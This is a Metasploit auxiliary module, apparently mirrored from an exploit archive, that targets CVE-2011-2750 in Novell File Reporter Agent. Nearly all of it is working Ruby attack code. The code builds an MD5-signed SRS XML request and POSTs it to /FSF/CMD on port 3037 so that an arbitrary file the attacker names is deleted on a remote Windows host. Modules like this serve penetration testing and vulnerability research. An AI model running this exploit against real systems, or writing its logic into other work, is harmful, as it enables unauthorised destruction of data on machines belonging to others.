Share
## https://sploitus.com/exploit?id=PACKETSTORM:180891
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Novell File Reporter Agent Arbitrary File Delete',  
'Description' => %q{  
NFRAgent.exe in Novell File Reporter allows remote attackers to delete  
arbitrary files via a full pathname in an SRS request with OPERATION set to 4 and  
CMD set to 5 against /FSF/CMD. This module has been tested successfully on NFR  
Agent 1.0.4.3 (File Reporter 1.0.2) and NFR Agent 1.0.3.22 (File Reporter 1.0.1) on  
Windows platforms.  
},  
'Author' => [  
'Luigi Auriemma', # Vulnerability discovery and Poc  
'juan vazquez' # Metasploit module  
],  
'References' => [  
[ 'CVE', '2011-2750' ],  
[ 'OSVDB', '73729' ],  
[ 'URL', 'http://aluigi.org/adv/nfr_2-adv.txt'],  
]  
)  
)  
  
register_options(  
[  
Opt::RPORT(3037),  
OptBool.new('SSL', [true, 'Use SSL', true]),  
OptString.new('RPATH', [ true, 'The remote file path to delete', 'c:\\test.txt' ]),  
]  
)  
end  
  
def run  
peer = "#{rhost}:#{rport}"  
record = "<RECORD><NAME>SRS</NAME><OPERATION>4</OPERATION><CMD>5</CMD><PATH>#{datastore['RPATH']}</PATH></RECORD>"  
md5 = Rex::Text.md5('SRS' + record + 'SERVER').upcase  
message = md5 + record  
  
print_status("Trying to delete #{datastore['RPATH']}...")  
  
res = send_request_cgi(  
{  
'uri' => '/FSF/CMD',  
'version' => '1.1',  
'method' => 'POST',  
'ctype' => 'text/xml',  
'data' => message  
}, 5  
)  
  
if res && (res.code == 200) && res.body =~ (%r{<RESULT><VERSION>1</VERSION><STATUS>0</STATUS><TRANSID>0</TRANSID></RESULT>})  
print_good("File #{datastore['RPATH']} successfully deleted")  
else  
print_error('File not deleted')  
end  
end  
end